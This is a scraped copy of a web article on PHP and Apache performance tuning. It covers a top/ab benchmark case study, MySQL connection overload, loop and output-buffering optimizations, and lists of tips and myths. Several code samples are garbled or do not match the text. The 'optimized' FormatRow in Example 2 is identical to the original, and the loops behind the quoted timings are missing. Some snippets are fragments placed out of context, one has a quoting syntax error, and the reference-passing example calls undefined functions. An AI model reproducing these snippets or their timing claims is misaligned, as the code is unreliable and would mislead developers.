While running the benchmark, on the server side we monitored the resource utilization using the command “top d 1″. The parameters “d 1″ mean to delay 1 second between updates. The output is shown below.

10:58pm  up  3:36,  2 users,  load average: 9.07, 3.29, 1.79
74 processes: 63 sleeping, 11 running, 0 zombie, 0 stopped
CPU0 states: 92.0% user,  7.0% system,  0.0% nice,  0.0% idle
CPU1 states: 95.0% user,  4.0% system,  0.0% nice,  0.0% idle
Mem:  1028484K av,  230324K used,  798160K free,      64K shrd,   27196K buff
Swap: 2040244K av,       0K used, 2040244K free                   30360K cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME COMMAND
 1142 apache    20   0  7280 7280  3780 R    21.2  0.7   0:20 httpd
 1154 apache    17   0  8044 8044  3788 S    19.3  0.7   0:20 httpd
 1155 apache    20   0  8052 8052  3796 R    19.3  0.7   0:20 httpd
 1141 apache    15   0  6764 6764  3780 S    14.7  0.6   0:20 httpd
 1174 apache    14   0  6848 6848  3788 S    12.9  0.6   0:20 httpd
 1178 apache    13   0  6864 6864  3804 S    12.9  0.6   0:19 httpd
 1157 apache    15   0  7536 7536  3788 R    11.0  0.7   0:19 httpd
 1159 apache    15   0  7540 7540  3788 R    11.0  0.7   0:19 httpd
 1148 apache    11   0  6672 6672  3784 S    10.1  0.6   0:20 httpd
 1158 apache    14   0  7400 7400  3788 R    10.1  0.7   0:19 httpd
 1163 apache    20   0  7540 7540  3788 R    10.1  0.7   0:19 httpd
 1169 apache    12   0  6856 6856  3796 S    10.1  0.6   0:20 httpd
 1176 apache    16   0  8052 8052  3796 R    10.1  0.7   0:19 httpd
 1171 apache    15   0  7984 7984  3780 S     9.2  0.7   0:18 httpd
 1170 apache    16   0  7204 7204  3796 R     6.4  0.7   0:20 httpd
 1168 apache    10   0  6856 6856  3796 S     4.6  0.6   0:20 httpd
 1377 natsoft   11   0  1104 1104   856 R     2.7  0.1   0:02 top
 1152 apache     9   0  6752 6752  3788 S     1.8  0.6   0:20 httpd
 1167 apache     9   0  6848 6848  3788 S     0.9  0.6   0:19 httpd
    1 root       8   0   520  520   452 S     0.0  0.0   0:04 init
    2 root       9   0     0    0     0 SW    0.0  0.0   0:00 keventd

Looking at the output of “top”, the twin CPU Apache server is running flat out with 0% idle time. What is worse is that the load average is 9.07 for the past minute (and 3.29 for the past 5 minutes, 1.79 for the past 15 minutes). The load average is the average number of processes that are ready to be run. For a twin processor server, any load above 2.0 means that the system is being overloaded. You might notice that there is a close relationship between load (9.07) and the number of simultaneous connections (10) that we have defined with ab.

Luckily we have plenty of physical memory, with about 798,160 Mb free and no virtual memory used.

Further down we can see the processes ordered by CPU utilization. The most active ones are the Apache httpd processes. The first httpd task is using 7280K of memory, and is taking an average of 21.2% of CPU and 0.7% of physical memory. The STAT column indicates the status: R is runnable, S is sleeping, and W means that the process is swapped out.

Given the above figures, and assuming this a typical peak load, we can perform some planning. If the load average is 9.0 for a twin-CPU server and assuming each task takes about the same amount of time to complete, then a lightly loaded server should be 9.0 / 2 CPUs = 4.5 times faster. So a HTTP request that used to take 1.283 seconds to satisfy at peak load will take about 1.283 / 4.5 = 0.285 seconds to complete.

# ab   -n100 -c2 http://192.168.0.99/php/testmysql.php

[ some lines omitted for brevity ]

Requests per second:    7.10
Transfer rate:          187.37 kb/s received

Connnection Times (ms)
              min   avg   max
Connect:        0     2    40
Processing:   255   279   292
Total:        255   281   332

Conversely, doubling the connections, we can predict that the average connection time should double from 1.283 to 2.566 seconds. In the benchmarks, the actual time was 2.570 seconds.

Overload on 40 connections

When we pushed the benchmark to use 40 connections, the server overloaded with 35% failed requests. On further investigation, it was because the MySQL server persistent connects were failing because of “Too Many Connections”.

The benchmark also demonstrates the lingering behavior of Apache child processes. Each PHP script uses 2 persistent connections, so at 40 connections, we should only be using at most 80 persistent connections, well below the default MySQL max_connections of 100. However Apache idle child processes are not assigned immediately to new requests due to latencies, keep-alives and other technical reasons; these lingering child processes held the remaining 20+ persistent connections that were “the straws that broke the Camel’s back”.

The Fix

By switching to non-persistent database connections, we were able to fix this problem and obtained a result of 5.340 seconds. An alternative solution would have been to increase the MySQL max_connections parameter from the default of 100.

Conclusions

The above case study once again shows us that optimizing your performance is extremely complex. It requires an understanding of multiple software subsystems including network routing, the TCP/IP stack, the amount of physical and virtual memory, the number of CPUs, the behavior of Apache child processes, your PHP scripts, and the database configuration.

In this case the PHP code was quite well tuned, so the first bottleneck was the CPU, which caused a slowdown in response time. As the load increased, the system slowed down in a near linear fashion (which is a good sign) until we encountered the more serious bottleneck of MySQL client connections. This caused multiple errors in our PHP pages until we fixed it by switching to non-persistent connections.

From the above figures, we can calculate for a given desired response time, how many simultaneous HTTP connections we can handle. Assuming two-way network latencies of 0.5 seconds on the Internet (0.25s one way), we can predict:

As our client wanted a maximum response time of 5 seconds, the server can handle up to 34 simultaneous connections per second. This works out to a peak capacity of 34/5 = 6.8 page views per second.

To get the maximum number of page views a day that the server can handle, multiply the peak capacity per second by 50,000 (this technique is suggested by the webmasters at pair.com, a large web hosting company), to give 340,000 page views a day.

Code Optimizations

The patient reader who is still wondering why so much emphasis is given to discussing non-PHP issues is reminded that PHP is a fast language, and many of the likely bottlenecks causing slow speeds lie outside PHP.

Most PHP scripts are simple. They involve reading some session information, loading some data from a content management system or database, formatting the appropriate HTML and echoing the results to the HTTP client. Assuming that a typical PHP script completes in 0.1 seconds and the Internet latency is 0.2 seconds, only 33% of the 0.3 seconds response time that the HTTP client sees is actual PHP computation. So if you improve a script’s speed by 20%, the HTTP client will see response times drop to 0.28 seconds, which is an insignificant improvement. Of course the server can probably handle 20% more requests for the same page, so scalability has improved.

The above example does not mean we should throw our hands up and give up. It means that we should not feel proud tweaking the last 1% of speed from our code, but we should spend our time optimizing worthwhile areas of our code to get higher returns.

High Return Code Optimizations

The places where such high returns are achievable are in the while and for loops that litter our code, where each slowdown in the code is magnified by the number of times we iterate over them. The best way of understanding what can be optimized is to use a few examples:

Example 1

Here is one simple example that prints an array:

for ($j=0; $j<sizeof($arr); $j++)
echo $arr[$j].”<br>”;

This can be substantially speeded up by changing the code to:

for ($j=0, $max = sizeof($arr), $s = ”; $j<$max; $j++)
$s .= $arr[$j].”<br>”;

First we need to understand that the expression $j<sizeof($arr) is evaluated within the loop multiple times. As sizeof($arr) is actually a constant (invariant), we move the cache the sizeof($arr) in the $max variable. In technical terms, this is called loop invariant optimization.

ob_start();
for ($j=0, $max = sizeof($arr), $s = ”; $j<$max; $j++)
echo $arr[$j].”<br>”;

Note that output buffering with ob_start() can be used as a global optimization for all PHP scripts. In long-running scripts, you will also want to flush the output buffer periodically so that some feedback is sent to the HTTP client. This can be done with ob_end_flush(). This function also turns off output buffering, so you might want to call ob_start() again immediately after the flush.

In summary, this example has shown us how to optimize loop invariants and how to use output buffering to speed up our code.

Example 2

In the following code, we iterate through a PEAR DB recordset, using a special formatting function to format a row, and then we echo the results. This time, I benchmarked the execution time at 10.2 ms (this excludes the database connection and SQL execution time):

function FormatRow(&$recordSet)
{
$arr = $recordSet->fetchRow();
return ‘<b>’.$arr[0].’</b><i>’.$arr[1].’</i>’;
}

From example 1, we learnt that we can optimize the code by changing the code to the following (execution time: 8.7 ms):

function FormatRow(&$recordSet)
{
$arr = $recordSet->fetchRow();
return ‘<b>’.$arr[0].’</b><i>’.$arr[1].’</i>’;
}

My benchmarks showed me that the use of $max contributed 0.5 ms and ob_start contributed 1 ms to the 1.5 ms speedup.

function FormatRow($arr)
{
return ‘<b>’.$arr[0].’</b><i>’.$arr[1].</i>’;
}

One last optimization is possible here. We can remove the overhead of the function call (potentially sacrificing maintainability for speed) to shave off another 0.1 milliseconds (execution time: 8.4 ms):

ob_start();

By switching to PEAR Cache, execution time dropped again to 3.5 ms for cached data:

require_once(“Cache/Output.php”);

We summarize the optimization methods below:

From the above figures, you can see that biggest speed improvements are derived not from tweaking the code, but by simple global optimizations such as ob_start(), or using radically different algorithms such as HTML caching.

Summary of Tweaks

1. The more you understand the software you are using (Apache, PHP, IIS, your database) and the deeper your knowledge of the operating system, networking and server hardware, the better you can perform global optimizations on your code and your system.
2. For PHP scripts, the most expensive bottleneck is normally the CPU. Twin CPUs are probably more useful than two Gigabytes of RAM.
3. Compile PHP with the “configure –-enable-inline-optimization” option to generate the fastest possible PHP executable.
4. Tune your database and index the fields that are commonly used in your SQL WHERE criteria. ADOdb, the very popular database abstraction library, provides a SQL tuning mode, where you can view your invalid, expensive and suspicious SQL, their execution plans and in which PHP script the SQL was executed.
5. Use HTML caching if you have data that rarely changes. Even if the data changes every minute, caching can help provided the data is synchronized with the cache. Depending on your code complexity, it can improve your performance by a factor of 10.
6. Benchmark your most complex code early (or at least a prototype), so you get a feel of the expected performance before it is too late to fix. Try to use realistic amounts of test data to ensure that it scales properly. Updated 11 July 2004: To benchmark with an execution profile of all function calls, you can try the xdebug extension. For a brief tutorial of how i use xdebug, see squeezing code with xdebug. There are commercial products to do this also, eg. Zend Studio.
7. Consider using a opcode cache. This gives a speedup of between 10-200%, depending on the complexity of your code. Make sure you do some stress tests before you install a cache because some are more reliable than others.
8. Use ob_start() at the beginning of your code. This gives you a 5-15% boost in speed for free on Apache. You can also use gzip compression for extra fast downloads (this requires spare CPU cycles).
9. Consider installing Zend Optimizer. This is free and does some optimizations, but be warned that some scripts actually slow down when Zend Optimizer is installed. The consensus is that Zend Optimizer is good when your code has lots of loops. Today many opcode accelerators have similar features (added this sentence 21 Oct 2003).
10. Optimize your loops first. Move loop invariants (constants) outside the loop.
11. Use the array and string functions where possible. They are faster than writing equivalent code in PHP.
12. The fastest way to concatenate multiple small strings into one large string is to create an output buffer (ob_start) and to echo into the buffer. At the end get the contents using ob_get_contents. This works because memory allocation is normally the killer in string concatenation, and output buffering allocates a large 40K initial buffer that grows in 10K chunks. Added 22 June 2004.
13. Pass objects and arrays using references in functions. Return objects and arrays as references where possible also. If this is a short script, and code maintenance is not an issue, you can consider using global variables to hold the objects or arrays.
14. If you have many PHP scripts that use session variables, consider recompiling PHP using the shared memory module for sessions, or use a RAM Disk. Enable this with “configure -–with-mm” then re-compile PHP, and set session.save_handler=mm in php.ini.
15. For searching for substrings, the fastest code is using strpos(), followed by preg_match() and lastly ereg(). Similarly, str_replace() is faster than preg_replace(), which is faster than ereg_replace().
16. Added 11 July 2004: Order large switch statements with most frequently occuring cases on top. If some of the most common cases are in the default section, consider explicitly defining these cases at the top of the switch statement.
17. For processing XML, parsing with regular expressions is significantly faster than using DOM or SAX.
18. Unset() variables that are not used anymore to reduce memory usage. This is mostly useful for resources and large arrays.
19. For classes with deep hierarchies, functions defined in derived classes (child classes) are invoked faster than those defined in base class (parent class). Consider replicating the most frequently used code in the base class in the derived classes too.
20. Consider writing your code as a PHP extension or a Java class or a COM object if your need that extra bit of speed. Be careful of the overhead of marshalling data between COM and Java.

Useless Optimizations

Some optimizations are useful. Others are a waste of time – sometimes the improvement is neglible, and sometimes the PHP internals change, rendering the tweak obsolete.

Here are some common PHP legends:

a. echo is faster than print

Echo is supposed to be faster because it doesn’t return a value while print does. From my benchmarks with PHP 4.3, the difference is neglible. And under some situations, print is faster than echo (when ob_start is enabled).

b. strip off comments to speed up code

If you use an opcode cache, comments are already ignored. This is a myth from PHP3 days, when each line of PHP was interpreted in run-time.

c. ‘var=’.$var is faster than “var=$var”

This used to be true in PHP 4.2 and earlier. This was fixed in PHP 4.3. Note (22 June 2004): apparently the 4.3 fix reduced the overhead, but not completely. However I find the performance difference to be negligible.

function TestRef(&$a)
{
    $b = $a;
    $c = $a;
}
$one = 1;
ProcessArrayRef($one);

function TestNoRef($a)
{
    $b = $a;
    $c = $a;
}
$one = 1;
ProcessArrayNoRef($one);

Many thanks also to Andrei Zmievski for reviewing this article.

nguồn: http://phplens.com/lens/php-book/optimizing-debugging-php.php